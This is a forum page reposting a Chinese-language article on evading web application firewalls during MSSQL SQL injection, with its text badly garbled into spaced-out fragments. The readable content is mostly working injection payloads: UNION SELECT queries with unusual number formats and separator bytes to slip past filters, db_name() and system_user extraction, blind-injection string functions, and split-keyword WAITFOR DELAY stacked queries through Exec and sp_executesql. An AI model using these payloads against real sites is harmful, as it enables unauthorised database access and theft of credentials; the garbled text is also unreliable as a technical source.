设为首页收藏本站
切换到窄版

 找回密码
 立即注册
搜索
热搜: 活动 交友 discuz
Nmaps Club»论坛 Pentests Wiki Wiki 数据库 [891] 2019-01-14_WAFBypass数据库特性(MSsql探索篇) ...
返回列表 发新帖
查看: 8|回复: 0

[891] 2019-01-14_WAFBypass数据库特性(MSsql探索篇)

[复制链接]
s7ckTeam

6万

主题

-6万

回帖

-58

积分

管理员

积分
-58
发表于 7 天前 | 显示全部楼层 |阅读模式
2019-01-14_WAFBypass数据库特性(MSsql探索篇) W A F   B y p a s s M S s q l   B y p a s s   B y p a s s   2 0 1 9 - 0 1 - 1 4   # W A F   , 9 0 x 0 1 W A F M S S Q L i d = 1 . 1 u n i o n   s e l e c t i d = 1 e 0 u n i o n   s e l e c t i d = 1 . e u n i o n   s e l e c t 1 . e D S Q L F u z z M S s q l 0 x 0 2   5 s e l e c t   *   f r o m   a d m i n   w h e r e   i d = 1 u n i o n s e l e c t 1 , 2 , d b _ n a m e ( ) f r o m a d m i n u n i o n 1 M s s q l 2 M s s q l 使   / * * / 3 s e l e c t   *   f r o m   a d m i n   w h e r e   i d = 1 . 1 u n i o n   s e l e c t   1 , ' 2 ' , d b _ n a m e ( )   f r o m   a d m i n 4 1 E 0 s e l e c t   *   f r o m   a d m i n   w h e r e   i d = 1 e 0 u n i o n   s e l e c t   1 , ' 2 ' , d b _ n a m e ( )   f r o m   a d m i n 5   ( + ) ( - ) ( * ) ( / ) ( % ) & | ^ s e l e c t   u s e r n a m e , p a s s w o r d , i d   f r o m   a d m i n   w h e r e   i d = 1 - 1 u n i o n   s e l e c t   ' 1 ' , s y s t e m _ u s e r , 3   f r o m   a d m i n s e l e c t   u s e r n a m e , p a s s w o r d , i d   f r o m   a d m i n   w h e r e   i d = 1 e - u n i o n   s e l e c t   ' 1 ' , s y s t e m _ u s e r , 3   f r o m   a d m i n 6 A S P X [ 0 x 0 0 - 0 x 2 0 ] o x 2 e [ 0 x 3 0 - 0 x 3 9 ] o x 4 5 o x 6 5 [ 0 x 8 0 - 0 x f f ] 0 1 , 0 2 , 0 3 , 0 4 , 0 5 , 0 6 , 0 7 , 0 8 , 0 9 , 0 A , 0 B , 0 C , 0 D , 0 E , 0 F , 1 0 , 1 1 , 1 2 , 1 3 , 1 4 , 1 5 , 1 6 , 1 7 , 1 8 , 1 9 , 1 A , 1 B , 1 C , 1 D , 1 E , 1 F , 2 0
A S P :           [ 0 x 0 1 - 0 x 2 0 ] o x 2 e [ 0 x 3 0 - 0 x 3 9 ] o x 4 5 o x 6 5 s e l e c t   u s e r n a m e , p a s s w o r d , i d   f r o m   a d m i n   w h e r e   i d = 1   a n d   ' 1 ' l i k e ' 1 ' u n i o n   s e l e c t   n u l l , n u l l , n u l l u n i o n s e l e c t 1 M s s q l 2 M s s q l 使 / * * / 3       % 3 a     s e l e c t   *   f r o m   a d m i n   w h e r e   i d = 1   u n i o n : s e l e c t   1 , ' 2 ' , d b _ n a m e ( )   f r o m : a d m i n A S P X [ 0 x 0 0 - 0 x 2 0 ] 0 x 3 a [ 0 x 8 0 - 0 x f f ] % 3 a % a 0 % a 0 % 0 a A S P :           [ 0 x 0 1 - 0 x 2 0 ]   0 x 3 a s e l e c t 1 M s s q l 2 M s s q l 使 / * * / 3 % 2 b     +             s e l e c t   *   f r o m   a d m i n   w h e r e   i d = 1   u n i o n   s e l e c t + 1 , ' 2 ' , d b _ n a m e ( )   f r o m   a d m i n % 2 d     -               s e l e c t   *   f r o m   a d m i n   w h e r e   i d = 1   u n i o n   s e l e c t - 1 , ' 2 ' , d b _ n a m e ( )   f r o m   a d m i n % 2 e     .               s e l e c t   *   f r o m   a d m i n   w h e r e   i d = 1   u n i o n   s e l e c t . 1 , ' 2 ' , d b _ n a m e ( )   f r o m   a d m i n % 3 a     :               s e l e c t   *   f r o m   a d m i n   w h e r e   i d = 1   u n i o n   s e l e c t : 1 , ' 2 ' , d b _ n a m e ( )   f r o m   a d m i n % 7 e     ~             s e l e c t   *   f r o m   a d m i n   w h e r e   i d = 1   u n i o n   s e l e c t ~ 1 , ' 2 ' , d b _ n a m e ( )   f r o m   a d m i n f r o m 1 M s s q l 0 1 , 0 2 , 0 3 , 0 4 , 0 5 , 0 6 , 0 7 , 0 8 , 0 9 , 0 A , 0 B , 0 C , 0 D , 0 E , 0 F , 1 0 , 1 1 , 1 2 , 1 3 , 1 4 , 1 5 , 1 6 , 1 7 , 1 8 , 1 9 , 1 A , 1 B , 1 C , 1 D , 1 E , 1 F , 2 0 0 1 , 0 2 , 0 3 , 0 4 , 0 5 , 0 6 , 0 7 , 0 8 , 0 9 , 0 A , 0 B , 0 C , 0 D , 0 E , 0 F , 1 0 , 1 1 , 1 2 , 1 3 , 1 4 , 1 5 , 1 6 , 1 7 , 1 8 , 1 9 , 1 A , 1 B , 1 C , 1 D , 1 E , 1 F , 2 0
2 M s s q l 使 / * * / 3 A S P :           [ 0 x 0 1 - 0 x 2 0 ] 0 x 2 e [ 0 x 3 0 - 0 x 3 9 ] 0 x 4 5 0 x 6 5 [ 0 x 8 0 - 0 x f f ]   A S P X [ 0 x 0 0 - 0 x 2 0 ] 0 x 2 e [ 0 x 3 0 - 0 x 3 9 ] 0 x 4 5 0 x 6 5 i d = 1 % 2 0 u n i o n % 2 0 s e l e c t % 2 0 1 , ' 2 ' , d b _ n a m e ( ) % 8 0 f r o m % 2 0 a d m i n d b _ n a m e ( )   % 0 0 - % 2 0   % 8 0 - % f f i d = 1   u n i o n   s e l e c t   1 , ' 2 ' , d b _ n a m e + ( )   f r o m   a d m i n f r o m 1 M s s q l 2 M s s q l 使 / * * / 3     % 3 a         s e l e c t   *   f r o m   a d m i n   w h e r e   i d = 1   u n i o n : s e l e c t   1 , ' 2 ' , d b _ n a m e ( )   f r o m : a d m i n .         % 2 e         s e l e c t   *   f r o m   a d m i n   w h e r e   i d = 1   u n i o n   s e l e c t   1 , ' 2 ' , d b _ n a m e ( )   f r o m . i n f o r m a t i o n _ s c h e m a . S C H E M A T A A S P       [ 0 x 0 1 - 0 x 2 0 ] 0 x 2 e 0 x 3 a A S P X   [ 0 x 0 0 - 0 x 2 0 ] 0 x 2 e 0 x 3 a [ 0 x 8 0 - 0 x f f ] 0 x 0 3   S u b s t r i n g ( @ @ v e r s i o n , 1 , 1 ) L e f t ( @ @ v e r s i o n , 1 ) R i g h t ( @ @ v e r s i o n , 1 ) c h a r i n d e x ( ' t e s t ' , d b _ n a m e ( ) ) A s c i i ( a )   0 1 , 0 2 , 0 3 , 0 4 , 0 5 , 0 6 , 0 7 , 0 8 , 0 9 , 0 A , 0 B , 0 C , 0 D , 0 E , 0 F , 1 0 , 1 1 , 1 2 , 1 3 , 1 4 , 1 5 , 1 6 , 1 7 , 1 8 , 1 9 , 1 A , 1 B , 1 C , 1 D , 1 E , 1 F , 2 0 0 1 , 0 2 , 0 3 , 0 4 , 0 5 , 0 6 , 0 7 , 0 8 , 0 9 , 0 A , 0 B , 0 C , 0 D , 0 E , 0 F , 1 0 , 1 1 , 1 2 , 1 3 , 1 4 , 1 5 , 1 6 , 1 7 , 1 8 , 1 9 , 1 A , 1 B , 1 C , 1 D , 1 E , 1 F , 2 0
C h a r ( 9 7 )   w a f b y p a s s m s s q l ` D e c l a r e   @ s   v a r c h a r ( 5 0 0 0 )     ` ` / / @ s   v a r c h a r ( 5 0 0 0 ) ` ` S e t   @     ` ` / / @ s ` ` E x e c ( @ s )   ` ` / / @ s ` i d = 1 ; E x e c ( ' W A ' + ' I T F O R   D E L A Y   ' ' 0 : 0 : 5 ' ' ' )   i d = 1 ; d e c l a r e   @ t e s t   n v a r c h a r ( 5 0 ) ; s e t   @ t e s t = ' w a i t ' + ' f o r   d e l a y   ' ' 0 : 0 : 5 ' ' ' ; e x e c   s p _ e x e c u t e s q l   @ t e s t 0 X 0 4   E N D     M S s q l F u z z 便 B y p a s s A b o u t   M e W A F
回复

举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

使用Markdown编辑器编辑 使用富文本编辑器编辑

Archiver|手机版|小黑屋|Nmaps Club

GMT+8, 2025-1-23 10:41 , Processed in 0.132868 second(s), 29 queries .

Powered by Discuz! X3.5

© 2001-2025 Discuz! Team.

快速回复 返回顶部 返回列表